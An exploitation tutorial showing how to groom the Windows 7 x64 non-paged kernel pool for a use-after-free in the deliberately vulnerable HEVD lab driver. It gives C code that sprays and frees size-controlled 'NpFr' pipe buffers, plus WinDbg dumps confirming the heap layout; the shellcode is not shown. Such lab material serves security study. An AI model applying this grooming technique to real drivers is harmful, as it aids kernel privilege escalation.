Windows Kernel Exploitation - Exploiting HEVD x64 Use-After-Free using Generic Non-Paged Pool Feng-Shui

Introduction

There are many excellent tutorials and solutions for exploiting the HEVD [1] use-after-free on Windows 7 32-bit. All of these solutions use IoCompletionReserve objects to groom the kernel pool [2] [3] [4] [5] [6] [7]. However, most systems today run a 64-bit version of Windows, so it is worth finding out how a UAF in a vulnerable 64-bit driver can be exploited.

P.S.: If you have already tried to develop an exploit for the HEVD use-after-free, you can skip directly to the section Generic Non-Paged Kernel Pool Feng-Shui.

HEVD Use-after-free



After playing around with HEVD and triggering the UAF, we observed that the size of the freed pool chunk was 0x58. This chunk size is suitable for exploitation on 32-bit Windows. Now, let’s look at the most popular way of performing non-paged kernel pool feng-shui when exploiting pool corruption on Windows 7 32-bit. The most commonly used method of spraying the kernel pool is to allocate Windows kernel objects [8] [9] [10]. Let’s take a look at the chunk sizes of various kernel objects on Windows 7 32-bit. I borrowed code from [11] and extended it to explore the sizes of a few more kernel objects.

The size of each kernel object can be found using WinDbg as follows:

kd> !handle 0x28

PROCESS 875f9538 SessionId: 1 Cid: 0e20 Peb: 7ffdf000 ParentCid: 0980

DirBase: 3eb644e0 ObjectTable: 9403b0f0 HandleCount: 16.

Image: objsize.exe

Handle table at 9403b0f0 with 16 entries in use

0028: Object: 879cca30 GrantedAccess: 001f0003 Entry: a0b4d050

Object: 879cca30 Type: (851e0308) Event

ObjectHeader: 879cca18 (new version)

HandleCount: 1 PointerCount: 1

kd> !pool 879cca30 2

Pool page 879cca30 region is Nonpaged pool

*879cca00 size: 40 previous size: 40 (Allocated) *Even (Protected)

Pooltag Even : Event objects

The following table lists the chunk sizes of several kernel objects:

| Kernel Object | Size |
|---|---|
| IoCompletionReserve | 0x60 |
| Event | 0x40 |
| Semaphore | 0x48 |
| Mutant | 0x50 |
| Job | 0x168 |
| File | 0xB8 |
| Timer | 0xC8 |
| Thread | 0x2E8 |

Table 1 - Kernel Object Sizes for Windows 7 32-bit

As can be seen above, each object allocates a fixed-size chunk in the non-paged pool, and the IoCompletionReserve object has a chunk size of 0x60. As mentioned earlier, the freed HEVD pool chunk was 0x58 bytes, which becomes 0x60 once the 0x8-byte pool header is included, so the IoCompletionReserve object is suitable for grooming the kernel pool when exploiting the HEVD use-after-free. Now, let’s compile HEVD for Windows 7 64-bit [12] and trigger the use-after-free.



The above screenshot shows the allocation of the UaF object. There are two notable differences from 32-bit here:

- The pool chunk size is 0x60 (excluding the header). Even though the size requested for the buffer was 0x58, the Windows memory manager appends padding bytes to round it up to 0x60. In other words, the pool allocation granularity on 64-bit Windows is 0x10 bytes.

- The header size is 0x10 instead of 0x8.
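The two differences combine into the chunk size that `!pool` reports. As a minimal sketch of that arithmetic (the helper name `pool_chunk_size` is made up for illustration, and the 0x8-byte granularity used for the 32-bit case is an assumption; the other values come from the text above):

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper: size of a small pool chunk as shown by !pool,
 * i.e. the requested size rounded up to the pool granularity, plus the
 * pool header. */
size_t pool_chunk_size(size_t request, size_t header, size_t granularity)
{
    assert(granularity != 0);
    size_t rounded = (request + granularity - 1) / granularity * granularity;
    return rounded + header;
}
```

Under these assumptions, `pool_chunk_size(0x58, 0x10, 0x10)` evaluates to 0x70 for the 64-bit driver, while `pool_chunk_size(0x58, 0x8, 0x8)` evaluates to 0x60 for the 32-bit one.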





Both of the above screenshots show that the size of the vulnerable UaF pool chunk is 0x70 (0x60 plus the 0x10 header), so we need to find a suitable object that allocates a chunk of the same size in the non-paged pool. We will take the same approach as for 32-bit and run our program to allocate kernel objects and determine their sizes on Windows 7 64-bit.

kd> !handle 0x2c

PROCESS fffffa8003145260

SessionId: 1 Cid: 0438 Peb: 7fffffde000 ParentCid: 0868

DirBase: 2b436000 ObjectTable: fffff8a0026353a0 HandleCount: 17.

Image: objsize.exe

Handle table at fffff8a0026353a0 with 17 entries in use

002c: Object: fffffa8002ff9830 GrantedAccess: 001f0003 Entry: fffff8a0026890b0

Object: fffffa8002ff9830 Type: (fffffa8000d54570) Event

ObjectHeader: fffffa8002ff9800 (new version)

HandleCount: 1 PointerCount: 1

kd> !pool fffffa8002ff9830 2

Pool page fffffa8002ff9830 region is Nonpaged pool

*fffffa8002ff97d0 size: 80 previous size: 160 (Allocated) *Even (Protected)

Pooltag Even : Event objects

The following table lists the chunk sizes of various kernel objects on Windows 7 64-bit:

| Kernel Object | Size |
|---|---|
| IoCompletionReserve | 0xC0 |
| Event | 0x80 |
| Semaphore | 0x80 |
| Mutant | 0xA0 |
| Job | 0x230 |
| File | 0x150 |
| Timer | 0x170 |
| Thread | 0x500 |

Table 2 - Kernel Object Sizes for Windows 7 64-bit
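Checking the two tables against the chunk size we need can be sketched as a simple lookup. The struct and function names below are made up for illustration; the sizes are copied from Table 1 and Table 2.

```c
#include <assert.h>
#include <stddef.h>

struct object_size {
    const char *name;
    size_t chunk_size;   /* as reported by !pool, pool header included */
};

/* Values copied from Table 1 (Windows 7 32-bit). */
static const struct object_size win7_x86_objects[] = {
    { "IoCompletionReserve", 0x60 }, { "Event", 0x40 },
    { "Semaphore", 0x48 },           { "Mutant", 0x50 },
    { "Job", 0x168 },                { "File", 0xB8 },
    { "Timer", 0xC8 },               { "Thread", 0x2E8 },
};

/* Values copied from Table 2 (Windows 7 64-bit). */
static const struct object_size win7_x64_objects[] = {
    { "IoCompletionReserve", 0xC0 }, { "Event", 0x80 },
    { "Semaphore", 0x80 },           { "Mutant", 0xA0 },
    { "Job", 0x230 },                { "File", 0x150 },
    { "Timer", 0x170 },              { "Thread", 0x500 },
};

/* Returns the first object whose chunk size equals `wanted`, or NULL. */
static const char *find_object(const struct object_size *table,
                               size_t count, size_t wanted)
{
    assert(table != NULL);
    for (size_t i = 0; i < count; i++) {
        if (table[i].chunk_size == wanted)
            return table[i].name;
    }
    return NULL;
}

const char *find_x86_object(size_t wanted)
{
    return find_object(win7_x86_objects,
                       sizeof(win7_x86_objects) / sizeof(win7_x86_objects[0]),
                       wanted);
}

const char *find_x64_object(size_t wanted)
{
    return find_object(win7_x64_objects,
                       sizeof(win7_x64_objects) / sizeof(win7_x64_objects[0]),
                       wanted);
}
```

With these tables, `find_x86_object(0x60)` returns the IoCompletionReserve entry, whereas `find_x64_object(0x70)` returns NULL.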

You can see that none of these objects allocates a 0x70-sized pool chunk, so none of them is suitable for grooming the kernel pool. All the object sizes are 0x80 or larger. We then looked at other APIs that create kernel objects and came across the CreatePipe API. We quickly added CreatePipe to our code and checked whether the kernel object it allocates has a suitable size.

kd> !handle 0x28

PROCESS fffffa8001109060

SessionId: 1 Cid: 0244 Peb: 7fffffde000 ParentCid: 0814

DirBase: 12e54000 ObjectTable: fffff8a002973670 HandleCount: 10.

Image: nppasa.exe

Handle table at fffff8a002973670 with 10 entries in use

0028: Object: fffffa800111d520 GrantedAccess: 00120196 Entry: fffff8a0029880a0

Object: fffffa800111d520 Type: (fffffa8000cf2640) File

ObjectHeader: fffffa800111d4f0 (new version)

HandleCount: 1 PointerCount: 1

kd> !pool fffffa800111d520 2

Pool page fffffa800111d520 region is Nonpaged pool

*fffffa800111d4b0 size: 150 previous size: 90 (Allocated) *File (Protected)

Pooltag File : File objects

To our disappointment, we found that the CreatePipe API in fact creates a File kernel object, just like the CreateFile API, so in its current form CreatePipe is not useful to us either. We can conclude that although allocating kernel objects is a very popular technique for grooming the non-paged kernel pool, it lacks flexibility when we want to control the size of the pool chunk being allocated.

As the source is available for HEVD, we could have easily modified the size of the freed pool chunk to match the size of one of the Windows kernel objects and recompiled the driver. In real life we do not have that luxury: the chunk size required to exploit a given vulnerability can vary and may not match any kernel object size. In this scenario we need a technique that fulfills the following requirements:

- Ability to allocate pool chunk in non-paged pool

- Ability to control the size of the allocated pool chunk

- Ability to control the contents of the allocated chunk

- Ability to free the allocated pool chunk

- Ability to do all of the above indirectly from user space

Generic Non-Paged Kernel Pool Feng-Shui

At first we thought that we had hit a roadblock, but then we stumbled upon a blog post by Alex Ionescu [13].

Standing on the shoulders of giants

For the sake of completeness, let’s first briefly discuss the technique explained by Alex, as the whole idea is borrowed from it. In his case, the goal was to place shellcode in kernel memory and then leak its base address, so that execution could later jump to it to escalate privileges. If the shellcode lives in kernel-mode address space, one does not have to worry about bypassing SMEP. CreatePipe and WriteFile were therefore used to allocate chunks in the non-paged pool, with the pipe buffer size chosen so that the allocation lands in the large pool. Later, the large pool allocations were enumerated using the NtQuerySystemInformation API, and the previously allocated chunk was located by matching its pool type, tag and size, which reveals its address. Now, let’s see how we can adapt this technique for our purposes.

Controlled allocations in Non-Paged Pool

// Source: http://www.alex-ionescu.com/?p=231

// Non-paged pool feng-shui using CreatePipe() and WriteFile()

// Allocation of arbitrary size chunks in Non-Paged Pool

// Look for allocation tag 'NpFr'

// Use PoolMonX to confirm chunk allocation of desired size

#include <Windows.h>

#include <stdio.h>

#define ALLOC_SIZE 0x70 // Adjust this value to get chunk allocations of desired length

#define BUFSIZE (ALLOC_SIZE - 0x48) // Calculating buffer size to allocate chunks of given length

int main()

{

UCHAR payLoad[BUFSIZE];

BOOL res = FALSE;

HANDLE readPipe = NULL;

HANDLE writePipe = NULL;

DWORD resultLength;

// Write the data in user space buffer

RtlFillMemory(payLoad, BUFSIZE, 0x41);

// Creating the pipe to kernel space

res = CreatePipe(

&readPipe,

&writePipe,

NULL,

sizeof(payLoad));

if (res == FALSE)

{

printf("[!] Failed creating Pipe\r\n");

goto Cleanup;

}

else

{

printf("\r\n[+] Pipe Created successfully!\r\n");

printf("\t[+] Read Pipe: 0x%p\r\n", readPipe); // %p: handles are pointer-sized on x64

printf("\t[+] Write Pipe: 0x%p\r\n", writePipe);

}



The size and contents of the allocated pool chunk depend on the payLoad variable. ALLOC_SIZE represents the size of the pool chunk we want to allocate. We calculate the correct BUFSIZE by subtracting 0x48 (the header overhead) from it. The contents of the payLoad buffer are initialized using the RtlFillMemory() API. When we create a pipe using the CreatePipe() API, it returns two handles: one for the read end and one for the write end of the pipe.
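To make the size calculation concrete, here is a minimal sketch of the same arithmetic in both directions. The helper names are made up for illustration. The split of the 0x48 bytes into a 0x10-byte pool header and a 0x38-byte DATA_ENTRY header is an assumption inferred from the 0x10 header size noted earlier, and the rounding only applies to small (sub-page) allocations.

```c
#include <assert.h>
#include <stddef.h>

#define POOL_HEADER_SIZE  0x10  /* x64 pool header, as noted earlier */
#define POOL_GRANULARITY  0x10  /* x64 pool allocation granularity */
#define NPFR_OVERHEAD     0x48  /* value subtracted by BUFSIZE in the code above */
/* Assumption: whatever is left of the overhead is the DATA_ENTRY header. */
#define DATA_ENTRY_HEADER (NPFR_OVERHEAD - POOL_HEADER_SIZE)

/* Number of bytes to write into the pipe to get a chunk of `chunk_size`. */
size_t pipe_write_size(size_t chunk_size)
{
    assert(chunk_size > NPFR_OVERHEAD);
    return chunk_size - NPFR_OVERHEAD;
}

/* Chunk size expected for a pipe write of `write_size` bytes. */
size_t npfr_chunk_size(size_t write_size)
{
    size_t request = write_size + DATA_ENTRY_HEADER;
    size_t rounded = (request + POOL_GRANULARITY - 1)
                     / POOL_GRANULARITY * POOL_GRANULARITY;
    return rounded + POOL_HEADER_SIZE;
}
```

For the 0x70 target, `pipe_write_size(0x70)` gives 0x28, and feeding 0x28 back into `npfr_chunk_size()` gives 0x70 again. Slightly smaller writes would land in the same chunk size because of the rounding.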



Now, we will use an amazing tool named PoolMonX [14], by Pavel Yosifovich, to track the pool allocations. The pool tag of interest here is ‘NpFr’. Initially, as we can see above, there are no allocations corresponding to the tag ‘NpFr’.

// Write data into the kernel space buffer from user space buffer

// The following API call will trigger allocation in non-paged pool

res = FALSE;

res = WriteFile(

writePipe,

payLoad,

sizeof(payLoad),

&resultLength,

NULL);

if (res == FALSE)

{

printf("[!] Failed writing to Pipe\r\n");

goto Cleanup;

}

else

{

printf("[+] Size Allocated due to write: 0x%x\r\n", resultLength);

printf("[+] Written to file, successfully!\r\n\r\n");

}

The above code uses WriteFile() API to write the data in the payLoad to the previously created pipe, using the write handle.





As soon as we write the data to the pipe, we can see that there is an allocation corresponding to the ‘NpFr’ tag. We can also observe that the size corresponding to ‘NpFr’ allocation is 112, which is 0x70 in hex. So, indeed we were successful in allocating a non-paged pool chunk of our desired size.

Cleanup:

CloseHandle(writePipe);

CloseHandle(readPipe);

printf("Read and Write Pipe closed\r\n");

return 0;

}

The above code closes the read and write handles of the previously opened pipe.

Now, we can see that the previously allocated pool chunk of size 0x70 with tag ‘NpFr’ has been freed, and the number of allocated pool chunks for ‘NpFr’ is 0 again. This confirms that we can easily control the allocation and deallocation of a 0x70-sized chunk in the non-paged pool using CreatePipe(), WriteFile() and CloseHandle().

Non-Paged Kernel Pool Defragmentation

Now we can modify the above code to defragment the non-paged kernel pool for size 0x70. First, let’s look at the state of the pool before the defragmentation spray.

kd> !poolused 2 NpFr

*** CacheSize too low - increasing to 64 MB

Max cache size is : 67108864 bytes (0x10000 KB)

Total memory in cache : 3168 bytes (0x4 KB)

Number of regions cached: 21

29 full reads broken into 32 partial reads

counts: 10 cached/22 uncached, 31.25% cached

bytes : 151 cached/1816 uncached, 7.68% cached

** Transition PTEs are implicitly decoded

** Prototype PTEs are implicitly decoded

.

Sorting by NonPaged Pool Consumed

NonPaged Paged

Tag Allocs Used Allocs Used

TOTAL 0 0 0 0

We can see that there are no pool chunks allocated in non-paged pool, corresponding to ‘NpFr’ tag. Now we will execute the spray code and check the kernel pool again.

kd> !poolused 2 NpFr

Sorting by NonPaged Pool Consumed

NonPaged Paged

Tag Allocs Used Allocs Used

NpFr 12288 1376256 0 0 DATA_ENTRY records (read/write buffers) , Binary: npfs.sys

TOTAL 12288 1376256 0 0

We can see lots of DATA_ENTRY records allocated in non-paged pool.

Grooming Non-Paged Kernel Pool

Now, we will go ahead and perform the allocation part of the grooming phase.

kd> !poolused 2 NpFr

.

Sorting by NonPaged Pool Consumed

NonPaged Paged

Tag Allocs Used Allocs Used

NpFr 17664 1978368 0 0 DATA_ENTRY records (read/write buffers) , Binary: npfs.sys

TOTAL 17664 1978368 0 0

We can dump the addresses of all the DATA_ENTRY record pool chunks as follows:

kd> !poolfind NpFr -nonpaged

---------------------------------- SNIP --------------------------------------------------

fffffa8004ddb600 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

fffffa8004ddb670 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

fffffa8004ddb6e0 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

fffffa8004ddb750 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

fffffa8004ddb7c0 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

fffffa8004ddb830 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

fffffa8004ddb8a0 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

fffffa8004ddb910 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

fffffa8004ddb980 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

fffffa8004ddb9f0 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

fffffa8004ddba60 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

fffffa8004ddbad0 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

fffffa8004ddbb40 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

fffffa8004ddbbb0 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

fffffa8004ddbc20 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

fffffa8004ddbc90 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

fffffa8004ddbd00 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

fffffa8004ddbd70 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

fffffa8004ddbde0 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

fffffa8004ddbe50 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

fffffa8004ddbec0 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

fffffa8004ddbf30 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

fffffa8004ddbfa0 : tag NpFr, size 0x60, Nonpaged pool, quota process fffffa80028cf060

The size in the above output is 0x60 because the !poolfind command does not include the pool header size.
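The relationship between the `!poolfind` view and the `!pool` view can be written down explicitly. A minimal sketch, assuming `!poolfind` reports the address and size of the chunk body just past the 0x10-byte pool header, which is what the numbers in these dumps suggest; the function names are made up for illustration:

```c
#include <assert.h>
#include <stdint.h>

#define POOL_HEADER_SIZE 0x10u  /* x64 pool header size */

/* Address of the pool header for a body address printed by !poolfind. */
uint64_t chunk_start(uint64_t body_address)
{
    assert(body_address >= POOL_HEADER_SIZE);
    return body_address - POOL_HEADER_SIZE;
}

/* Full chunk size (as printed by !pool) for a body size from !poolfind. */
uint64_t chunk_size(uint64_t body_size)
{
    return body_size + POOL_HEADER_SIZE;
}
```

For the first entry listed, `chunk_start(0xfffffa8004ddb600)` yields 0xfffffa8004ddb5f0 and `chunk_size(0x60)` yields 0x70. The 0x70 stride between consecutive `!poolfind` addresses (for example 0xfffffa8004ddb670 minus 0xfffffa8004ddb600) tells the same story.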

kd> !pool fffffa8004ddb600

Pool page fffffa8004ddb600 region is Nonpaged pool

fffffa8004ddb000 size: 70 previous size: 0 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb070 size: b0 previous size: 70 (Free) ....

fffffa8004ddb120 size: 70 previous size: b0 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb190 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb200 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb270 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb2e0 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb350 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb3c0 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb430 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb4a0 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb510 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb580 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

*fffffa8004ddb5f0 size: 70 previous size: 70 (Allocated) *NpFr Process: fffffa80028cf060

Pooltag NpFr : DATA_ENTRY records (read/write buffers), Binary : npfs.sys

fffffa8004ddb660 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb6d0 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb740 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb7b0 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb820 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb890 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb900 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb970 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb9e0 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddba50 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddbac0 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddbb30 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddbba0 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddbc10 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddbc80 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddbcf0 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddbd60 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddbdd0 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddbe40 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddbeb0 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddbf20 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddbf90 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

The above dump shows that the allocations sit back to back in the kernel pool memory. Now, we will try to create a lot of holes in the pool, so that the vulnerable UaF object falls into one of these holes.
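The article does not list the spray code itself, so the following is only a sketch of one way the spray and the hole punching could be written, not the code that produced these dumps. It reuses the CreatePipe(), WriteFile() and CloseHandle() calls from the earlier listing. The `pipe_slot` type and the function names are made up for illustration, and the idea that closing every second pipe leaves alternating holes assumes that consecutive writes end up in adjacent chunks. On non-Windows builds a dry-run backend only tracks the bookkeeping.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#ifdef _WIN32
#include <Windows.h>
#endif

#define ALLOC_SIZE 0x70                 /* target chunk size, header included */
#define BUFSIZE    (ALLOC_SIZE - 0x48)  /* same calculation as the code above */

/* One slot is one pipe; its pending write keeps one 'NpFr' chunk allocated. */
typedef struct {
    void *read_end;    /* HANDLE on Windows */
    void *write_end;   /* HANDLE on Windows */
    int   live;        /* 1 while the chunk is expected to be allocated */
} pipe_slot;

#ifdef _WIN32
static int slot_open(pipe_slot *slot)
{
    unsigned char payload[BUFSIZE];
    HANDLE r = NULL, w = NULL;
    DWORD written = 0;

    memset(payload, 0x41, sizeof(payload));
    if (!CreatePipe(&r, &w, NULL, sizeof(payload)))
        return 0;
    if (!WriteFile(w, payload, sizeof(payload), &written, NULL)) {
        CloseHandle(w);
        CloseHandle(r);
        return 0;
    }
    slot->read_end = r;
    slot->write_end = w;
    slot->live = 1;
    return 1;
}

static void slot_close(pipe_slot *slot)
{
    CloseHandle(slot->write_end);
    CloseHandle(slot->read_end);
    slot->live = 0;
}
#else
/* Dry-run backend for non-Windows builds: no kernel allocation happens. */
static int slot_open(pipe_slot *slot)
{
    memset(slot, 0, sizeof(*slot));
    slot->live = 1;
    return 1;
}

static void slot_close(pipe_slot *slot)
{
    slot->live = 0;
}
#endif

/* Spray: open `count` pipes in order; returns how many succeeded. */
size_t spray(pipe_slot *slots, size_t count)
{
    size_t i;
    assert(slots != NULL);
    for (i = 0; i < count; i++) {
        if (!slot_open(&slots[i]))
            break;
    }
    return i;
}

/* Hole punching: close every second pipe; returns the number of holes. */
size_t punch_holes(pipe_slot *slots, size_t count)
{
    size_t holes = 0;
    assert(slots != NULL);
    for (size_t i = 1; i < count; i += 2) {
        if (slots[i].live) {
            slot_close(&slots[i]);
            holes++;
        }
    }
    return holes;
}
```

Under these assumptions, a typical sequence would be a first `spray()` call to fill existing gaps (the defragmentation step), a second `spray()` on a fresh array for the grooming allocations, and then `punch_holes()` on that second array before triggering the allocation of the UaF object.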

kd> !poolused 2 NpFr

.

Sorting by NonPaged Pool Consumed

NonPaged Paged

Tag Allocs Used Allocs Used

NpFr 14976 1677312 0 0 DATA_ENTRY records (read/write buffers) , Binary: npfs.sys

TOTAL 14976 1677312 0 0
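The three `!poolused` snapshots can be cross-checked with a little arithmetic. A minimal sketch, with helper names made up for illustration and the 0x70 chunk size taken from the `!pool` output:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define NPFR_CHUNK_SIZE 0x70  /* chunk size including the pool header */

/* Bytes that !poolused should report for `allocs` chunks of 0x70 bytes. */
size_t npfr_bytes_used(size_t allocs)
{
    assert(allocs <= SIZE_MAX / NPFR_CHUNK_SIZE);  /* overflow guard */
    return allocs * NPFR_CHUNK_SIZE;
}

/* Chunks added (positive) or removed (negative) between two snapshots. */
long alloc_delta(size_t before, size_t after)
{
    return (long)after - (long)before;
}
```

With the numbers from the dumps, 12288, 17664 and 14976 allocations correspond to 1376256, 1978368 and 1677312 bytes, matching the Used column. The grooming phase added 5376 chunks and the deallocation removed 2688 of them, exactly half, which is consistent with freeing every alternate chunk.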

After the deallocation, we can see that the number of pool chunks corresponding to ‘NpFr’ has decreased, but we still need to check whether the kernel pool is in the desired state.

kd> !pool fffffa8004ddb600

Pool page fffffa8004ddb600 region is Nonpaged pool

fffffa8004ddb000 size: 70 previous size: 0 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb070 size: b0 previous size: 70 (Free) ....

fffffa8004ddb120 size: 70 previous size: b0 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb190 size: 70 previous size: 70 (Free) NpFr

fffffa8004ddb200 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb270 size: 70 previous size: 70 (Free) NpFr

fffffa8004ddb2e0 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb350 size: 70 previous size: 70 (Free) NpFr

fffffa8004ddb3c0 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb430 size: 70 previous size: 70 (Free) NpFr

fffffa8004ddb4a0 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb510 size: 70 previous size: 70 (Free) NpFr

fffffa8004ddb580 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

*fffffa8004ddb5f0 size: 70 previous size: 70 (Free) *NpFr

Pooltag NpFr : DATA_ENTRY records (read/write buffers), Binary : npfs.sys

fffffa8004ddb660 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb6d0 size: 70 previous size: 70 (Free) NpFr

fffffa8004ddb740 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb7b0 size: 70 previous size: 70 (Free) NpFr

fffffa8004ddb820 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb890 size: 70 previous size: 70 (Free) NpFr

fffffa8004ddb900 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddb970 size: 70 previous size: 70 (Free) NpFr

fffffa8004ddb9e0 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddba50 size: 70 previous size: 70 (Free) NpFr

fffffa8004ddbac0 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddbb30 size: 70 previous size: 70 (Free) NpFr

fffffa8004ddbba0 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddbc10 size: 70 previous size: 70 (Free) NpFr

fffffa8004ddbc80 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddbcf0 size: 70 previous size: 70 (Free) NpFr

fffffa8004ddbd60 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddbdd0 size: 70 previous size: 70 (Free) NpFr

fffffa8004ddbe40 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddbeb0 size: 70 previous size: 70 (Free) NpFr

fffffa8004ddbf20 size: 70 previous size: 70 (Allocated) NpFr Process: fffffa80028cf060

fffffa8004ddbf90 size: 70 previous size: 70 (Free) NpFr

The above dump confirms that the grooming was successful: we created several holes between allocations. From this point onwards, exploiting the HEVD UaF is straightforward and similar to the x86 version. We just need to make some changes to the shellcode for Windows 7 x64 and we should be good to go.



Here is the mandatory screenshot showing successful exploitation of the HEVD UAF on Windows 7 SP1 64-bit.

References

[1] HackSys Extreme Vulnerable Driver

[2] https://github.com/sam-b/HackSysDriverExploits/blob/master/HackSysUseAfterFree/HackSysUseAfterFree/HackSysUseAfterFree.cpp

[3] https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Exploit/UseAfterFree.c

[4] https://github.com/theevilbit/exploits/blob/master/HEVD/hacksysUAF.py

[5] https://github.com/GradiusX/HEVD-Python-Solutions/blob/master/Win7%20x86/HEVD_UAF.py

[6] http://www.fuzzysecurity.com/tutorials/expDev/19.html

[7] https://github.com/tekwizz123/HEVD-Exploit-Solutions/blob/master/HEVD-UaF-Exploit/HEVD-UaF-Exploit/HEVD-UaF-Exploit.cpp

[8] Kernel Objects

[9] First Dip Into the Kernel Pool : MS10-058

[10] Reserve Objects in Windows 7

[11] Windows Kernel Exploitation Part 4: Introduction to Windows Kernel Pool Exploitation

[12] Kernel Hacking With HEVD Part 1 - The Setup

[13] Sheep Year Kernel Heap Fengshui: Spraying in the Big Kids’ Pool

[14] PoolMonX